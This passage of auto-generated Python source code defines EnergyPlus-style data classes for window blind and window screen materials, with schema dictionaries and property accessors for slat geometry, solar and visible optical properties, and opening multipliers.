Window blind thermal properties
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'slat orientation',
{'name': u'Slat Orientation',
'pyname': u'slat_orientation',
'default': u'Horizontal',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Horizontal',
u'Vertical'],
'autocalculatable': False,
'type': 'alpha'}),
(u'slat width',
{'name': u'Slat Width',
'pyname': u'slat_width',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat separation',
{'name': u'Slat Separation',
'pyname': u'slat_separation',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat thickness',
{'name': u'Slat Thickness',
'pyname': u'slat_thickness',
'default': 0.00025,
'minimum>': 0.0,
'maximum': 0.1,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat angle',
{'name': u'Slat Angle',
'pyname': u'slat_angle',
'default': 45.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'slat conductivity',
{'name': u'Slat Conductivity',
'pyname': u'slat_conductivity',
'default': 221.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'slat beam solar transmittance',
{'name': u'Slat Beam Solar Transmittance',
'pyname': u'slat_beam_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat beam solar reflectance',
{'name': u'Front Side Slat Beam Solar Reflectance',
'pyname': u'front_side_slat_beam_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat beam solar reflectance',
{'name': u'Back Side Slat Beam Solar Reflectance',
'pyname': u'back_side_slat_beam_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat diffuse solar transmittance',
{'name': u'Slat Diffuse Solar Transmittance',
'pyname': u'slat_diffuse_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat diffuse solar reflectance',
{'name': u'Front Side Slat Diffuse Solar Reflectance',
'pyname': u'front_side_slat_diffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat diffuse solar reflectance',
{'name': u'Back Side Slat Diffuse Solar Reflectance',
'pyname': u'back_side_slat_diffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat beam visible transmittance',
{'name': u'Slat Beam Visible Transmittance',
'pyname': u'slat_beam_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat beam visible reflectance',
{'name': u'Front Side Slat Beam Visible Reflectance',
'pyname': u'front_side_slat_beam_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat beam visible reflectance',
{'name': u'Back Side Slat Beam Visible Reflectance',
'pyname': u'back_side_slat_beam_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat diffuse visible transmittance',
{'name': u'Slat Diffuse Visible Transmittance',
'pyname': u'slat_diffuse_visible_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat diffuse visible reflectance',
{'name': u'Front Side Slat Diffuse Visible Reflectance',
'pyname': u'front_side_slat_diffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat diffuse visible reflectance',
{'name': u'Back Side Slat Diffuse Visible Reflectance',
'pyname': u'back_side_slat_diffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat infrared hemispherical transmittance',
{'name': u'Slat Infrared Hemispherical Transmittance',
'pyname': u'slat_infrared_hemispherical_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat infrared hemispherical emissivity',
{'name': u'Front Side Slat Infrared Hemispherical Emissivity',
'pyname': u'front_side_slat_infrared_hemispherical_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat infrared hemispherical emissivity',
{'name': u'Back Side Slat Infrared Hemispherical Emissivity',
'pyname': u'back_side_slat_infrared_hemispherical_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind to glass distance',
{'name': u'Blind to Glass Distance',
'pyname': u'blind_to_glass_distance',
'default': 0.05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.01,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'blind top opening multiplier',
{'name': u'Blind Top Opening Multiplier',
'pyname': u'blind_top_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind bottom opening multiplier',
{'name': u'Blind Bottom Opening Multiplier',
'pyname': u'blind_bottom_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind left side opening multiplier',
{'name': u'Blind Left Side Opening Multiplier',
'pyname': u'blind_left_side_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind right side opening multiplier',
{'name': u'Blind Right Side Opening Multiplier',
'pyname': u'blind_right_side_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'minimum slat angle',
{'name': u'Minimum Slat Angle',
'pyname': u'minimum_slat_angle',
'default': 0.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'maximum slat angle',
{'name': u'Maximum Slat Angle',
'pyname': u'maximum_slat_angle',
'default': 180.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 29,
'name': u'WindowMaterial:Blind',
'pyname': u'WindowMaterialBlind',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def slat_orientation(self):
"""field `Slat Orientation`
| Default value: Horizontal
Args:
value (str): value for IDD Field `Slat Orientation`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `slat_orientation` or None if not set
"""
return self["Slat Orientation"]
@slat_orientation.setter
def slat_orientation(self, value="Horizontal"):
"""Corresponds to IDD field `Slat Orientation`"""
self["Slat Orientation"] = value
@property
def slat_width(self):
"""field `Slat Width`
| Units: m
| IP-Units: in
| value <= 1.0
Args:
value (float): value for IDD Field `Slat Width`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_width` or None if not set
"""
return self["Slat Width"]
@slat_width.setter
def slat_width(self, value=None):
"""Corresponds to IDD field `Slat Width`"""
self["Slat Width"] = value
@property
def slat_separation(self):
"""field `Slat Separation`
| Distance between adjacent slat faces
| Units: m
| IP-Units: in
| value <= 1.0
Args:
value (float): value for IDD Field `Slat Separation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_separation` or None if not set
"""
return self["Slat Separation"]
@slat_separation.setter
def slat_separation(self, value=None):
"""Corresponds to IDD field `Slat Separation`"""
self["Slat Separation"] = value
@property
def slat_thickness(self):
"""field `Slat Thickness`
| Distance between top and bottom surfaces of slat
| Slat is assumed to be rectangular in cross section and flat
| Units: m
| IP-Units: in
| Default value: 0.00025
| value <= 0.1
Args:
value (float): value for IDD Field `Slat Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_thickness` or None if not set
"""
return self["Slat Thickness"]
@slat_thickness.setter
def slat_thickness(self, value=0.00025):
"""Corresponds to IDD field `Slat Thickness`"""
self["Slat Thickness"] = value
@property
def slat_angle(self):
"""field `Slat Angle`
| If WindowProperty:ShadingControl for the window that incorporates this blind
| has Type of Slat Angle Control for Blinds = FixedSlatAngle,
| then this is the fixed value of the slat angle;
| If WindowProperty:ShadingControl for the window that incorporates this blind
| has Type of Slat Angle Control for Blinds = BlockBeamSolar,
| then this is the slat angle when slat angle control
| is not in effect (e.g., when there is no beam solar on the blind);
| Not used if WindowProperty:ShadingControl for the window that incorporates this blind
| has Type of Slat Angle Control for Blinds = ScheduledSlatAngle.
| Units: deg
| Default value: 45.0
| value <= 180.0
Args:
value (float): value for IDD Field `Slat Angle`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_angle` or None if not set
"""
return self["Slat Angle"]
@slat_angle.setter
def slat_angle(self, value=45.0):
"""Corresponds to IDD field `Slat Angle`"""
self["Slat Angle"] = value
@property
def slat_conductivity(self):
"""field `Slat Conductivity`
| default is for aluminum
| Units: W/m-K
| Default value: 221.0
Args:
value (float): value for IDD Field `Slat Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_conductivity` or None if not set
"""
return self["Slat Conductivity"]
@slat_conductivity.setter
def slat_conductivity(self, value=221.0):
"""Corresponds to IDD field `Slat Conductivity`"""
self["Slat Conductivity"] = value
@property
def slat_beam_solar_transmittance(self):
"""field `Slat Beam Solar Transmittance`
| value < 1.0
Args:
value (float): value for IDD Field `Slat Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_beam_solar_transmittance` or None if not set
"""
return self["Slat Beam Solar Transmittance"]
@slat_beam_solar_transmittance.setter
def slat_beam_solar_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Beam Solar Transmittance`"""
self["Slat Beam Solar Transmittance"] = value
@property
def front_side_slat_beam_solar_reflectance(self):
"""field `Front Side Slat Beam Solar Reflectance`
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beam_solar_reflectance` or None if not set
"""
return self["Front Side Slat Beam Solar Reflectance"]
@front_side_slat_beam_solar_reflectance.setter
def front_side_slat_beam_solar_reflectance(self, value=None):
"""Corresponds to IDD field `Front Side Slat Beam Solar Reflectance`"""
self["Front Side Slat Beam Solar Reflectance"] = value
@property
def back_side_slat_beam_solar_reflectance(self):
"""field `Back Side Slat Beam Solar Reflectance`
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beam_solar_reflectance` or None if not set
"""
return self["Back Side Slat Beam Solar Reflectance"]
@back_side_slat_beam_solar_reflectance.setter
def back_side_slat_beam_solar_reflectance(self, value=None):
"""Corresponds to IDD field `Back Side Slat Beam Solar Reflectance`"""
self["Back Side Slat Beam Solar Reflectance"] = value
@property
def slat_diffuse_solar_transmittance(self):
"""field `Slat Diffuse Solar Transmittance`
| Must equal "Slat beam solar transmittance"
| value < 1.0
Args:
value (float): value for IDD Field `Slat Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_diffuse_solar_transmittance` or None if not set
"""
return self["Slat Diffuse Solar Transmittance"]
@slat_diffuse_solar_transmittance.setter
def slat_diffuse_solar_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Diffuse Solar Transmittance`"""
self["Slat Diffuse Solar Transmittance"] = value
@property
def front_side_slat_diffuse_solar_reflectance(self):
"""field `Front Side Slat Diffuse Solar Reflectance`
| Must equal "Front Side Slat Beam Solar Reflectance"
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_diffuse_solar_reflectance` or None if not set
"""
return self["Front Side Slat Diffuse Solar Reflectance"]
@front_side_slat_diffuse_solar_reflectance.setter
def front_side_slat_diffuse_solar_reflectance(self, value=None):
"""Corresponds to IDD field `Front Side Slat Diffuse Solar
Reflectance`"""
self["Front Side Slat Diffuse Solar Reflectance"] = value
@property
def back_side_slat_diffuse_solar_reflectance(self):
"""field `Back Side Slat Diffuse Solar Reflectance`
| Must equal "Back Side Slat Beam Solar Reflectance"
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_diffuse_solar_reflectance` or None if not set
"""
return self["Back Side Slat Diffuse Solar Reflectance"]
@back_side_slat_diffuse_solar_reflectance.setter
def back_side_slat_diffuse_solar_reflectance(self, value=None):
"""Corresponds to IDD field `Back Side Slat Diffuse Solar
Reflectance`"""
self["Back Side Slat Diffuse Solar Reflectance"] = value
@property
def slat_beam_visible_transmittance(self):
"""field `Slat Beam Visible Transmittance`
| Required for detailed daylighting calculation
| value < 1.0
Args:
value (float): value for IDD Field `Slat Beam Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_beam_visible_transmittance` or None if not set
"""
return self["Slat Beam Visible Transmittance"]
@slat_beam_visible_transmittance.setter
def slat_beam_visible_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Beam Visible Transmittance`"""
self["Slat Beam Visible Transmittance"] = value
@property
def front_side_slat_beam_visible_reflectance(self):
"""field `Front Side Slat Beam Visible Reflectance`
| Required for detailed daylighting calculation
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beam_visible_reflectance` or None if not set
"""
return self["Front Side Slat Beam Visible Reflectance"]
@front_side_slat_beam_visible_reflectance.setter
def front_side_slat_beam_visible_reflectance(self, value=None):
"""Corresponds to IDD field `Front Side Slat Beam Visible
Reflectance`"""
self["Front Side Slat Beam Visible Reflectance"] = value
@property
def back_side_slat_beam_visible_reflectance(self):
"""field `Back Side Slat Beam Visible Reflectance`
| Required for detailed daylighting calculation
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beam_visible_reflectance` or None if not set
"""
return self["Back Side Slat Beam Visible Reflectance"]
@back_side_slat_beam_visible_reflectance.setter
def back_side_slat_beam_visible_reflectance(self, value=None):
"""Corresponds to IDD field `Back Side Slat Beam Visible
Reflectance`"""
self["Back Side Slat Beam Visible Reflectance"] = value
@property
def slat_diffuse_visible_transmittance(self):
"""field `Slat Diffuse Visible Transmittance`
| Used only for detailed daylighting calculation
| Must equal "Slat Beam Visible Transmittance"
| value < 1.0
Args:
value (float): value for IDD Field `Slat Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_diffuse_visible_transmittance` or None if not set
"""
return self["Slat Diffuse Visible Transmittance"]
@slat_diffuse_visible_transmittance.setter
def slat_diffuse_visible_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Diffuse Visible Transmittance`"""
self["Slat Diffuse Visible Transmittance"] = value
@property
def front_side_slat_diffuse_visible_reflectance(self):
"""field `Front Side Slat Diffuse Visible Reflectance`
| Required for detailed daylighting calculation
| Must equal "Front Side Slat Beam Visible Reflectance"
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_diffuse_visible_reflectance` or None if not set
"""
return self["Front Side Slat Diffuse Visible Reflectance"]
@front_side_slat_diffuse_visible_reflectance.setter
def front_side_slat_diffuse_visible_reflectance(self, value=None):
"""Corresponds to IDD field `Front Side Slat Diffuse Visible
Reflectance`"""
self["Front Side Slat Diffuse Visible Reflectance"] = value
@property
def back_side_slat_diffuse_visible_reflectance(self):
"""field `Back Side Slat Diffuse Visible Reflectance`
| Required for detailed daylighting calculation
| Must equal "Back Side Slat Beam Visible Reflectance"
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_diffuse_visible_reflectance` or None if not set
"""
return self["Back Side Slat Diffuse Visible Reflectance"]
@back_side_slat_diffuse_visible_reflectance.setter
def back_side_slat_diffuse_visible_reflectance(self, value=None):
"""Corresponds to IDD field `Back Side Slat Diffuse Visible
Reflectance`"""
self["Back Side Slat Diffuse Visible Reflectance"] = value
@property
def slat_infrared_hemispherical_transmittance(self):
"""field `Slat Infrared Hemispherical Transmittance`
| value < 1.0
Args:
value (float): value for IDD Field `Slat Infrared Hemispherical Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_infrared_hemispherical_transmittance` or None if not set
"""
return self["Slat Infrared Hemispherical Transmittance"]
@slat_infrared_hemispherical_transmittance.setter
def slat_infrared_hemispherical_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Infrared Hemispherical
Transmittance`"""
self["Slat Infrared Hemispherical Transmittance"] = value
@property
def front_side_slat_infrared_hemispherical_emissivity(self):
"""field `Front Side Slat Infrared Hemispherical Emissivity`
| Default value: 0.9
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_infrared_hemispherical_emissivity` or None if not set
"""
return self["Front Side Slat Infrared Hemispherical Emissivity"]
@front_side_slat_infrared_hemispherical_emissivity.setter
def front_side_slat_infrared_hemispherical_emissivity(self, value=0.9):
"""Corresponds to IDD field `Front Side Slat Infrared Hemispherical
Emissivity`"""
self["Front Side Slat Infrared Hemispherical Emissivity"] = value
@property
def back_side_slat_infrared_hemispherical_emissivity(self):
"""field `Back Side Slat Infrared Hemispherical Emissivity`
| Default value: 0.9
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_infrared_hemispherical_emissivity` or None if not set
"""
return self["Back Side Slat Infrared Hemispherical Emissivity"]
@back_side_slat_infrared_hemispherical_emissivity.setter
def back_side_slat_infrared_hemispherical_emissivity(self, value=0.9):
"""Corresponds to IDD field `Back Side Slat Infrared Hemispherical
Emissivity`"""
self["Back Side Slat Infrared Hemispherical Emissivity"] = value
@property
def blind_to_glass_distance(self):
"""field `Blind to Glass Distance`
| Units: m
| IP-Units: in
| Default value: 0.05
| value >= 0.01
| value <= 1.0
Args:
value (float): value for IDD Field `Blind to Glass Distance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `blind_to_glass_distance` or None if not set
"""
return self["Blind to Glass Distance"]
@blind_to_glass_distance.setter
def blind_to_glass_distance(self, value=0.05):
"""Corresponds to IDD field `Blind to Glass Distance`"""
self["Blind to Glass Distance"] = value
@property
def blind_top_opening_multiplier(self):
"""field `Blind Top Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Blind Top Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `blind_top_opening_multiplier` or None if not set
"""
return self["Blind Top Opening Multiplier"]
@blind_top_opening_multiplier.setter
def blind_top_opening_multiplier(self, value=0.5):
"""Corresponds to IDD field `Blind Top Opening Multiplier`"""
self["Blind Top Opening Multiplier"] = value
@property
def blind_bottom_opening_multiplier(self):
"""field `Blind Bottom Opening Multiplier`
| value <= 1.0
Args:
value (float): value for IDD Field `Blind Bottom Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `blind_bottom_opening_multiplier` or None if not set
"""
return self["Blind Bottom Opening Multiplier"]
@blind_bottom_opening_multiplier.setter
def blind_bottom_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Blind Bottom Opening Multiplier`"""
self["Blind Bottom Opening Multiplier"] = value
@property
def blind_left_side_opening_multiplier(self):
"""field `Blind Left Side Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Blind Left Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `blind_left_side_opening_multiplier` or None if not set
"""
return self["Blind Left Side Opening Multiplier"]
@blind_left_side_opening_multiplier.setter
def blind_left_side_opening_multiplier(self, value=0.5):
"""Corresponds to IDD field `Blind Left Side Opening Multiplier`"""
self["Blind Left Side Opening Multiplier"] = value
@property
def blind_right_side_opening_multiplier(self):
"""field `Blind Right Side Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Blind Right Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `blind_right_side_opening_multiplier` or None if not set
"""
return self["Blind Right Side Opening Multiplier"]
@blind_right_side_opening_multiplier.setter
def blind_right_side_opening_multiplier(self, value=0.5):
"""Corresponds to IDD field `Blind Right Side Opening Multiplier`"""
self["Blind Right Side Opening Multiplier"] = value
@property
def minimum_slat_angle(self):
"""field `Minimum Slat Angle`
| Used only if WindowProperty:ShadingControl for the window that incorporates
| this blind varies the slat angle (i.e., WindowProperty:ShadingControl with
| Type of Slat Angle Control for Blinds = ScheduledSlatAngle
| or BlockBeamSolar)
| Units: deg
| value <= 180.0
Args:
value (float): value for IDD Field `Minimum Slat Angle`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_slat_angle` or None if not set
"""
return self["Minimum Slat Angle"]
@minimum_slat_angle.setter
def minimum_slat_angle(self, value=None):
"""Corresponds to IDD field `Minimum Slat Angle`"""
self["Minimum Slat Angle"] = value
@property
def maximum_slat_angle(self):
"""field `Maximum Slat Angle`
| Used only if WindowProperty:ShadingControl for the window that incorporates
| this blind varies the slat angle (i.e., WindowProperty:ShadingControl with
| Type of Slat Angle Control for Blinds = ScheduledSlatAngle
| or BlockBeamSolar)
| Units: deg
| Default value: 180.0
| value <= 180.0
Args:
value (float): value for IDD Field `Maximum Slat Angle`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_slat_angle` or None if not set
"""
return self["Maximum Slat Angle"]
@maximum_slat_angle.setter
def maximum_slat_angle(self, value=180.0):
"""Corresponds to IDD field `Maximum Slat Angle`"""
self["Maximum Slat Angle"] = value
class WindowMaterialScreen(DataObject):
""" Corresponds to IDD object `WindowMaterial:Screen`
Window screen physical properties. Can only be located on the exterior side of a window construction.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'reflected beam transmittance accounting method',
{'name': u'Reflected Beam Transmittance Accounting Method',
'pyname': u'reflected_beam_transmittance_accounting_method',
'default': u'ModelAsDiffuse',
'required-field': False,
'autosizable': False,
'accepted-values': [u'DoNotModel',
u'ModelAsDirectBeam',
u'ModelAsDiffuse'],
'autocalculatable': False,
'type': 'alpha'}),
(u'diffuse solar reflectance',
{'name': u'Diffuse Solar Reflectance',
'pyname': u'diffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'diffuse visible reflectance',
{'name': u'Diffuse Visible Reflectance',
'pyname': u'diffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'thermal hemispherical emissivity',
{'name': u'Thermal Hemispherical Emissivity',
'pyname': u'thermal_hemispherical_emissivity',
'default': 0.9,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'default': 221.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'screen material spacing',
{'name': u'Screen Material Spacing',
'pyname': u'screen_material_spacing',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'screen material diameter',
{'name': u'Screen Material Diameter',
'pyname': u'screen_material_diameter',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'screen to glass distance',
{'name': u'Screen to Glass Distance',
'pyname': u'screen_to_glass_distance',
'default': 0.025,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.001,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'top opening multiplier',
{'name': u'Top Opening Multiplier',
'pyname': u'top_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'bottom opening multiplier',
{'name': u'Bottom Opening Multiplier',
'pyname': u'bottom_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'left side opening multiplier',
{'name': u'Left Side Opening Multiplier',
'pyname': u'left_side_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'right side opening multiplier',
{'name': u'Right Side Opening Multiplier',
'pyname': u'right_side_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'angle of resolution for screen transmittance output map',
{'name': u'Angle of Resolution for Screen Transmittance Output Map',
'pyname': u'angle_of_resolution_for_screen_transmittance_output_map',
'default': 0,
'required-field': False,
'autosizable': False,
'accepted-values': [0,
1,
2,
3,
5],
'autocalculatable': False,
'type': 'integer',
'unit': u'deg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 9,
'name': u'WindowMaterial:Screen',
'pyname': u'WindowMaterialScreen',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Enter a unique name for this window screen material.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def reflected_beam_transmittance_accounting_method(self):
"""field `Reflected Beam Transmittance Accounting Method`
| Select the method used to account for the beam solar reflected off the material surface.
| Default value: ModelAsDiffuse
Args:
value (str): value for IDD Field `Reflected Beam Transmittance Accounting Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `reflected_beam_transmittance_accounting_method` or None if not set
"""
return self["Reflected Beam Transmittance Accounting Method"]
@reflected_beam_transmittance_accounting_method.setter
def reflected_beam_transmittance_accounting_method(
self,
value="ModelAsDiffuse"):
"""Corresponds to IDD field `Reflected Beam Transmittance Accounting
Method`"""
self["Reflected Beam Transmittance Accounting Method"] = value
@property
def diffuse_solar_reflectance(self):
"""field `Diffuse Solar Reflectance`
| Diffuse reflectance of the screen material over the entire solar radiation spectrum.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `diffuse_solar_reflectance` or None if not set
"""
return self["Diffuse Solar Reflectance"]
@diffuse_solar_reflectance.setter
def diffuse_solar_reflectance(self, value=None):
"""Corresponds to IDD field `Diffuse Solar Reflectance`"""
self["Diffuse Solar Reflectance"] = value
@property
def diffuse_visible_reflectance(self):
"""field `Diffuse Visible Reflectance`
| Diffuse visible reflectance of the screen material averaged over the solar spectrum
| and weighted by the response of the human eye.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `diffuse_visible_reflectance` or None if not set
"""
return self["Diffuse Visible Reflectance"]
@diffuse_visible_reflectance.setter
def diffuse_visible_reflectance(self, value=None):
"""Corresponds to IDD field `Diffuse Visible Reflectance`"""
